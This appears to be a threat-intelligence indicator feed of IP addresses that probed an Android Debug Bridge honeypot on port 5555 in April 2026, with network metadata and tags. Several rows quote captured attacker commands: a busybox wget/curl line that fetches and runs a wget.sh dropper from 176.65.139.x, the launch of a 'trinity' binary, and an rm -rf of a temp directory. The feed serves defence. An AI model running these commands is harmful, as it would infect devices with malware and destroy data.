IPv4	204.76.203.226	Attacker IP • ADB / seen in ADBHoney; events=10; ports=5555; cc=NL; asn=51396; asn_org=Pfcloud UG (haftungsbeschrankt); adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=20 \| first_seen=2026-04-21T20:38:02.000Z \| last_seen=2026-04-26T11:23:01.311Z \| ports=5555 \| cc=NL \| asn=51396 \| org=Pfcloud UG (haftungsbeschrankt)	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-21
IPv4	176.65.139.11	Attacker IP • ADB / seen in ADBHoney; events=16; ports=5555; cc=LU; asn=214472; asn_org=Offshore LC; adb_cmd_hits=0; cmd="cd /data/local/tmp/; busybox wget http://176.65.139.8/wget.sh; sh wget.sh; curl http://176.65.139.8/wget.sh -o wget.sh; sh wget.sh; wget http://176.65.139.8/wge" Observed in ADBHoney telemetry for 2026-04. events=31 \| first_seen=2026-04-21T21:54:13.000Z \| last_seen=2026-04-22T05:04:54.464Z \| ports=5555 \| cc=LU \| asn=214472 \| org=Offshore LC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-21
IPv4	205.210.31.104	Attacker IP • ADB / seen in ADBHoney; events=22; ports=5555; cc=US; asn=396982; asn_org=Google LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=22 \| first_seen=2026-04-21T21:33:15.000Z \| last_seen=2026-04-21T21:44:50.752Z \| ports=5555 \| cc=US \| asn=396982 \| org=Google LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-21
IPv4	100.29.192.89	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=14618; asn_org=Amazon.com, Inc.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=5 \| first_seen=2026-04-22T00:03:21.000Z \| last_seen=2026-04-22T00:04:55.279Z \| ports=5555 \| cc=US \| asn=14618 \| org=Amazon.com, Inc.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-22
IPv4	18.97.19.167	Attacker IP • ADB / seen in ADBHoney; events=54; ports=5555; cc=US; asn=14618; asn_org=Amazon.com, Inc.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=54 \| first_seen=2026-04-22T00:13:18.000Z \| last_seen=2026-04-22T00:24:03.908Z \| ports=5555 \| cc=US \| asn=14618 \| org=Amazon.com, Inc.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-22
IPv4	39.144.91.203	Attacker IP • ADB / seen in ADBHoney; events=58; ports=5555; cc=CN; asn=24547; asn_org=Hebei Mobile Communication Company Limited; cats=Generic Protocol Command Decode; adb_cmd_hits=28; cmd="/data/local/tmp/nohup /data/local/tmp/trinity" Observed in ADBHoney telemetry for 2026-04. events=61 \| first_seen=2026-04-22T01:51:54.000Z \| last_seen=2026-04-22T02:04:40.361Z \| ports=5555 \| cc=CN \| asn=24547 \| org=Hebei Mobile Communication Company Limited \| related_hashes=0d3c687ffc30e185b836b99bd07fa2b0d460a090626f6bbbd40a95b98ea70257,76ae6d577ba96b1c3a1de8b21c32a9faf6040f7e78d98269e0469d896c29dc64,a1b6223a3ecb37b9f7e4a52909a08d9fd8f8f80aee46466127ea0f078c7f5437,d7188b8c575367e10ea8b36ec7cca067ef6ce6d26ffa8c74b3faa0b14ebb8ff0	malware_hosting, nadsec, tpot, adbhoney, android, iot, dropper, malware-distribution	2026-04-22
IPv4	65.49.20.117	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=5 \| first_seen=2026-04-22T01:26:26.000Z \| last_seen=2026-04-22T01:27:32.786Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-22
IPv4	65.49.20.69	Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=9 \| first_seen=2026-04-22T01:27:44.000Z \| last_seen=2026-04-22T01:37:48.907Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-22
IPv4	117.68.74.182	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=CN; asn=140527; asn_org=China Telecom; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=5 \| first_seen=2026-04-22T02:03:42.000Z \| last_seen=2026-04-22T02:04:52.334Z \| ports=5555 \| cc=CN \| asn=140527 \| org=China Telecom	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-22
IPv4	176.65.148.196	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=NL; asn=51396; asn_org=Pfcloud UG (haftungsbeschrankt); adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-22T02:08:14.000Z \| last_seen=2026-04-22T02:09:23.048Z \| ports=5555 \| cc=NL \| asn=51396 \| org=Pfcloud UG (haftungsbeschrankt)	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-22
IPv4	91.231.89.134	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=FR; asn=213412; asn_org=ONYPHE SAS; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=8 \| first_seen=2026-04-22T02:07:54.000Z \| last_seen=2026-04-22T02:18:07.605Z \| ports=5555 \| cc=FR \| asn=213412 \| org=ONYPHE SAS	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-22
IPv4	91.231.89.135	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=FR; asn=213412; asn_org=ONYPHE SAS; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=8 \| first_seen=2026-04-22T02:07:54.000Z \| last_seen=2026-04-22T02:17:55.673Z \| ports=5555 \| cc=FR \| asn=213412 \| org=ONYPHE SAS	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-22
IPv4	220.167.147.10	Attacker IP • ADB / seen in ADBHoney; events=45; ports=5555; cc=CN; asn=140061; asn_org=Qinghai Telecom; adb_cmd_hits=16; cmd="rm -rf /data/local/tmp/*" Observed in ADBHoney telemetry for 2026-04. events=45 \| first_seen=2026-04-22T04:02:56.000Z \| last_seen=2026-04-22T04:18:05.730Z \| ports=5555 \| cc=CN \| asn=140061 \| org=Qinghai Telecom \| related_hashes=0d3c687ffc30e185b836b99bd07fa2b0d460a090626f6bbbd40a95b98ea70257,71ecfb7bbc015b2b192c05f726468b6f08fcc804c093c718b950e688cc414af5	malware_hosting, nadsec, tpot, adbhoney, android, iot, dropper, malware-distribution	2026-04-22
IPv4	45.142.193.53	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=RO; asn=214295; asn_org=Skynet Network Ltd; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-22T05:03:04.000Z \| last_seen=2026-04-22T05:04:12.595Z \| ports=5555 \| cc=RO \| asn=214295 \| org=Skynet Network Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-22
IPv4	36.155.194.92	Attacker IP • ADB / seen in ADBHoney; events=55; ports=5555; cc=CN; asn=56046; asn_org=China Mobile communications corporation; cats=Generic Protocol Command Decode; adb_cmd_hits=0; cmd="/data/local/tmp/nohup /data/local/tmp/trinity" Observed in ADBHoney telemetry for 2026-04. events=55 \| first_seen=2026-04-22T10:01:10.000Z \| last_seen=2026-04-22T10:14:03.678Z \| ports=5555 \| cc=CN \| asn=56046 \| org=China Mobile communications corporation \| related_hashes=76ae6d577ba96b1c3a1de8b21c32a9faf6040f7e78d98269e0469d896c29dc64,a1b6223a3ecb37b9f7e4a52909a08d9fd8f8f80aee46466127ea0f078c7f5437,d7188b8c575367e10ea8b36ec7cca067ef6ce6d26ffa8c74b3faa0b14ebb8ff0	scanning_host, nadsec, tpot, adbhoney, android, iot, dropper, malware-distribution	2026-04-22
IPv4	20.65.194.113	Attacker IP • ADB / seen in ADBHoney; events=25; ports=5555; cc=US; asn=8075; asn_org=Microsoft Corporation; cats=Detection of a Network Scan; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=25 \| first_seen=2026-04-22T13:43:56.000Z \| last_seen=2026-04-22T13:56:00.997Z \| ports=5555 \| cc=US \| asn=8075 \| org=Microsoft Corporation	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-22
IPv4	176.65.139.58	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=LU; asn=214472; asn_org=Offshore LC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-22T14:29:11.000Z \| last_seen=2026-04-22T14:30:20.311Z \| ports=5555 \| cc=LU \| asn=214472 \| org=Offshore LC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-22
IPv4	64.62.197.208	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-22T14:56:40.000Z \| last_seen=2026-04-22T14:57:42.560Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-22
IPv4	143.42.1.191	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=5 \| first_seen=2026-04-22T15:47:22.000Z \| last_seen=2026-04-22T15:48:27.193Z \| ports=5555 \| cc=US \| asn=63949 \| org=Akamai Connected Cloud	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-22
IPv4	167.172.148.206	Attacker IP • ADB / seen in ADBHoney; events=16; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=16 \| first_seen=2026-04-22T17:12:47.000Z \| last_seen=2026-04-22T17:22:57.580Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-22
IPv4	168.144.46.7	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=SG; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-22T17:17:20.000Z \| last_seen=2026-04-22T17:18:26.804Z \| ports=5555 \| cc=SG \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-22
IPv4	176.65.139.8	Attacker IP • ADB / seen in ADBHoney; events=14; ports=5555; cc=LU; asn=214472; asn_org=Offshore LC; adb_cmd_hits=0; cmd="cd /data/local/tmp/; busybox wget http://176.65.139.11/wget.sh; sh wget.sh; curl http://176.65.139.11/wget.sh -o wget.sh; sh wget.sh; wget http://176.65.139.11/" Observed in ADBHoney telemetry for 2026-04. events=158 \| first_seen=2026-04-22T17:36:45.000Z \| last_seen=2026-04-28T15:57:03.857Z \| ports=5555 \| cc=LU \| asn=214472 \| org=Offshore LC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-22
IPv4	68.183.233.125	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=SG; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=8 \| first_seen=2026-04-22T17:50:34.000Z \| last_seen=2026-04-23T06:06:26.722Z \| ports=5555 \| cc=SG \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-22
IPv4	80.66.83.80	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=RU; asn=216473; asn_org=Bashinskii Vadim Ruslanovich; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=14 \| first_seen=2026-04-22T17:29:54.000Z \| last_seen=2026-04-23T15:07:43.898Z \| ports=5555 \| cc=RU \| asn=216473 \| org=Bashinskii Vadim Ruslanovich	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-22
IPv4	91.231.89.213	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=FR; asn=213412; asn_org=ONYPHE SAS; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=8 \| first_seen=2026-04-22T18:38:31.000Z \| last_seen=2026-04-22T18:48:47.270Z \| ports=5555 \| cc=FR \| asn=213412 \| org=ONYPHE SAS	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-22
IPv4	91.231.89.61	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=FR; asn=213412; asn_org=ONYPHE SAS; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=5 \| first_seen=2026-04-22T18:28:46.000Z \| last_seen=2026-04-22T18:29:51.626Z \| ports=5555 \| cc=FR \| asn=213412 \| org=ONYPHE SAS	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-22
IPv4	183.109.51.29	Attacker IP • ADB / seen in ADBHoney; events=14; ports=5555; cc=KR; asn=4766; asn_org=Korea Telecom; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=14 \| first_seen=2026-04-22T19:03:58.000Z \| last_seen=2026-04-22T19:14:08.081Z \| ports=5555 \| cc=KR \| asn=4766 \| org=Korea Telecom	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-22
IPv4	185.141.119.103	Attacker IP • ADB / seen in ADBHoney; events=19; ports=5555; cc=US; asn=207990; asn_org=HostRoyale Technologies Pvt Ltd; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=19 \| first_seen=2026-04-22T19:33:59.000Z \| last_seen=2026-04-22T19:44:12.527Z \| ports=5555 \| cc=US \| asn=207990 \| org=HostRoyale Technologies Pvt Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-22
IPv4	85.137.56.93	Attacker IP • ADB / seen in ADBHoney; events=10; ports=5555; cc=NL; asn=43641; asn_org=SOLLUTIUM EU Sp z.o.o.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=10 \| first_seen=2026-04-22T19:33:45.000Z \| last_seen=2026-04-22T19:34:58.218Z \| ports=5555 \| cc=NL \| asn=43641 \| org=SOLLUTIUM EU Sp z.o.o.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-22
IPv4	185.242.226.59	Attacker IP • ADB / seen in ADBHoney; events=23; ports=5555; cc=US; asn=202425; asn_org=IP Volume inc; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=23 \| first_seen=2026-04-22T21:13:08.000Z \| last_seen=2026-04-22T21:30:29.465Z \| ports=5555 \| cc=US \| asn=202425 \| org=IP Volume inc	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-22
IPv4	165.22.247.105	Attacker IP • ADB / seen in ADBHoney; events=22; ports=5555; cc=SG; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=67 \| first_seen=2026-04-22T22:43:58.000Z \| last_seen=2026-04-24T08:42:07.196Z \| ports=5555 \| cc=SG \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-22
IPv4	209.99.190.40	Attacker IP • ADB / seen in ADBHoney; events=42; ports=5555; cc=CH; asn=402253; asn_org=SKN Subnet & Telecom Ltd; cats=Generic Protocol Command Decode,Misc activity; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=49 \| first_seen=2026-04-23T03:49:47.000Z \| last_seen=2026-04-23T04:00:45.141Z \| ports=5555 \| cc=CH \| asn=402253 \| org=SKN Subnet & Telecom Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-23
IPv4	45.225.135.32	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=PA; asn=64107; asn_org=RACK SPHERE HOSTING S.A.; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-23T03:49:32.000Z \| last_seen=2026-04-23T03:50:40.880Z \| ports=5555 \| cc=PA \| asn=64107 \| org=RACK SPHERE HOSTING S.A.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-23
IPv4	65.49.1.182	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=10 \| first_seen=2026-04-23T03:50:48.000Z \| last_seen=2026-04-23T04:01:01.005Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-23
IPv4	65.49.1.185	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=5 \| first_seen=2026-04-23T03:49:30.000Z \| last_seen=2026-04-23T03:50:39.867Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-23
IPv4	45.135.193.131	Attacker IP • ADB / seen in ADBHoney; events=10; ports=5555; cc=DE; asn=51396; asn_org=Pfcloud UG (haftungsbeschrankt); adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=93 \| first_seen=2026-04-23T06:23:37.000Z \| last_seen=2026-04-26T08:47:13.146Z \| ports=5555 \| cc=DE \| asn=51396 \| org=Pfcloud UG (haftungsbeschrankt)	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-23
IPv4	123.192.224.204	Attacker IP • ADB / seen in ADBHoney; events=13; ports=5555; cc=TW; asn=38841; asn_org=kbro CO. Ltd.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=13 \| first_seen=2026-04-23T07:48:07.000Z \| last_seen=2026-04-23T07:58:15.107Z \| ports=5555 \| cc=TW \| asn=38841 \| org=kbro CO. Ltd.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-23
IPv4	190.164.39.104	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=CL; asn=22047; asn_org=VTR BANDA ANCHA S.A.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-23T08:22:07.000Z \| last_seen=2026-04-23T08:32:16.548Z \| ports=5555 \| cc=CL \| asn=22047 \| org=VTR BANDA ANCHA S.A.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-23
IPv4	134.122.45.11	Attacker IP • ADB / seen in ADBHoney; events=17; ports=5555; cc=CA; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=17 \| first_seen=2026-04-23T10:25:35.000Z \| last_seen=2026-04-23T10:35:48.335Z \| ports=5555 \| cc=CA \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-23
IPv4	204.76.203.73	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=NL; asn=51396; asn_org=Pfcloud UG (haftungsbeschrankt); adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=41 \| first_seen=2026-04-23T11:58:57.000Z \| last_seen=2026-04-30T20:50:56.676Z \| ports=5555 \| cc=NL \| asn=51396 \| org=Pfcloud UG (haftungsbeschrankt)	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-23
IPv4	146.190.216.3	Attacker IP • ADB / seen in ADBHoney; events=17; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=17 \| first_seen=2026-04-23T14:01:25.000Z \| last_seen=2026-04-23T14:13:09.291Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-23
IPv4	64.62.197.114	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-23T14:29:58.000Z \| last_seen=2026-04-23T14:31:01.183Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-23
IPv4	45.79.92.218	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=5 \| first_seen=2026-04-23T15:46:58.000Z \| last_seen=2026-04-23T15:47:58.512Z \| ports=5555 \| cc=US \| asn=63949 \| org=Akamai Connected Cloud	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-23
IPv4	1.64.115.226	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=HK; asn=4760; asn_org=HKT Limited; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-23T20:14:18.000Z \| last_seen=2026-04-23T20:15:55.292Z \| ports=5555 \| cc=HK \| asn=4760 \| org=HKT Limited	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-23
IPv4	146.103.41.62	Attacker IP • ADB / seen in ADBHoney; events=13; ports=5555; cc=DE; asn=215311; asn_org=Regxa Company for Information Technology Ltd; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=13 \| first_seen=2026-04-23T20:02:16.000Z \| last_seen=2026-04-23T20:54:34.240Z \| ports=5555 \| cc=DE \| asn=215311 \| org=Regxa Company for Information Technology Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-23
IPv4	68.183.109.132	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-24T00:52:05.000Z \| last_seen=2026-04-24T00:53:12.421Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-24
IPv4	205.210.31.238	Attacker IP • ADB / seen in ADBHoney; events=23; ports=5555; cc=US; asn=396982; asn_org=Google LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=23 \| first_seen=2026-04-24T01:05:43.000Z \| last_seen=2026-04-24T01:17:04.707Z \| ports=5555 \| cc=US \| asn=396982 \| org=Google LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-24
IPv4	185.141.119.101	Attacker IP • ADB / seen in ADBHoney; events=18; ports=5555; cc=US; asn=207990; asn_org=HostRoyale Technologies Pvt Ltd; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=74 \| first_seen=2026-04-24T03:49:45.000Z \| last_seen=2026-04-28T08:05:47.273Z \| ports=5555 \| cc=US \| asn=207990 \| org=HostRoyale Technologies Pvt Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-24
IPv4	45.131.108.107	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=NL; asn=49581; asn_org=Tube-Hosting; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=5 \| first_seen=2026-04-24T03:11:41.000Z \| last_seen=2026-04-24T03:13:16.033Z \| ports=5555 \| cc=NL \| asn=49581 \| org=Tube-Hosting	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-24
IPv4	152.32.149.35	Attacker IP • ADB / seen in ADBHoney; events=85; ports=5555; cc=US; asn=135377; asn_org=UCLOUD INFORMATION TECHNOLOGY HK LIMITED; adb_cmd_hits=2 Observed in ADBHoney telemetry for 2026-04. events=85 \| first_seen=2026-04-24T07:10:58.000Z \| last_seen=2026-04-24T07:24:03.300Z \| ports=5555 \| cc=US \| asn=135377 \| org=UCLOUD INFORMATION TECHNOLOGY HK LIMITED	malware_hosting, nadsec, tpot, adbhoney, android, iot	2026-04-24
IPv4	45.157.233.103	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=DE; asn=58212; asn_org=dataforest GmbH; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=9 \| first_seen=2026-04-24T07:17:19.000Z \| last_seen=2026-04-24T16:32:33.542Z \| ports=5555 \| cc=DE \| asn=58212 \| org=dataforest GmbH	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-24
IPv4	41.86.40.192	Attacker IP • ADB / seen in ADBHoney; events=20; ports=5555; cc=SC; asn=36958; asn_org=Cable & Wireless (Seychelles); adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=21 \| first_seen=2026-04-24T09:13:01.000Z \| last_seen=2026-04-24T10:08:09.942Z \| ports=5555 \| cc=SC \| asn=36958 \| org=Cable & Wireless (Seychelles)	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-24
IPv4	180.229.245.214	Attacker IP • ADB / seen in ADBHoney; events=13; ports=5555; cc=KR; asn=17858; asn_org=LG POWERCOMM; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=13 \| first_seen=2026-04-24T11:17:33.000Z \| last_seen=2026-04-24T11:27:46.486Z \| ports=5555 \| cc=KR \| asn=17858 \| org=LG POWERCOMM	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-24
IPv4	64.62.197.62	Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=9 \| first_seen=2026-04-24T11:13:18.000Z \| last_seen=2026-04-24T11:23:24.689Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-24
IPv4	64.62.197.65	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-24T11:12:40.000Z \| last_seen=2026-04-24T11:13:43.485Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-24
IPv4	216.218.206.67	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-24T13:23:06.000Z \| last_seen=2026-04-24T13:33:12.179Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-24
IPv4	216.218.206.71	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-24T13:21:49.000Z \| last_seen=2026-04-24T13:22:51.109Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-24
IPv4	47.91.31.15	Attacker IP • ADB / seen in ADBHoney; events=49; ports=5555; cc=JP; asn=45102; asn_org=Alibaba US Technology Co., Ltd.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=49 \| first_seen=2026-04-24T13:30:41.000Z \| last_seen=2026-04-24T13:32:46.352Z \| ports=5555 \| cc=JP \| asn=45102 \| org=Alibaba US Technology Co., Ltd.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-24
IPv4	143.42.173.101	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=6 \| first_seen=2026-04-24T15:46:36.000Z \| last_seen=2026-04-24T15:47:45.206Z \| ports=5555 \| cc=US \| asn=63949 \| org=Akamai Connected Cloud	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-24
IPv4	111.55.114.238	Attacker IP • ADB / seen in ADBHoney; events=58; ports=5555; cc=CN; asn=132525; asn_org=HeiLongJiang Mobile Communication Company Limited; adb_cmd_hits=0; cmd="/data/local/tmp/nohup /data/local/tmp/trinity" Observed in ADBHoney telemetry for 2026-04. events=58 \| first_seen=2026-04-24T17:08:48.000Z \| last_seen=2026-04-24T17:21:04.885Z \| ports=5555 \| cc=CN \| asn=132525 \| org=HeiLongJiang Mobile Communication Company Limited \| related_hashes=0d3c687ffc30e185b836b99bd07fa2b0d460a090626f6bbbd40a95b98ea70257,76ae6d577ba96b1c3a1de8b21c32a9faf6040f7e78d98269e0469d896c29dc64,a1b6223a3ecb37b9f7e4a52909a08d9fd8f8f80aee46466127ea0f078c7f5437,d7188b8c575367e10ea8b36ec7cca067ef6ce6d26ffa8c74b3faa0b14ebb8ff0	scanning_host, nadsec, tpot, adbhoney, android, iot, dropper, malware-distribution	2026-04-24
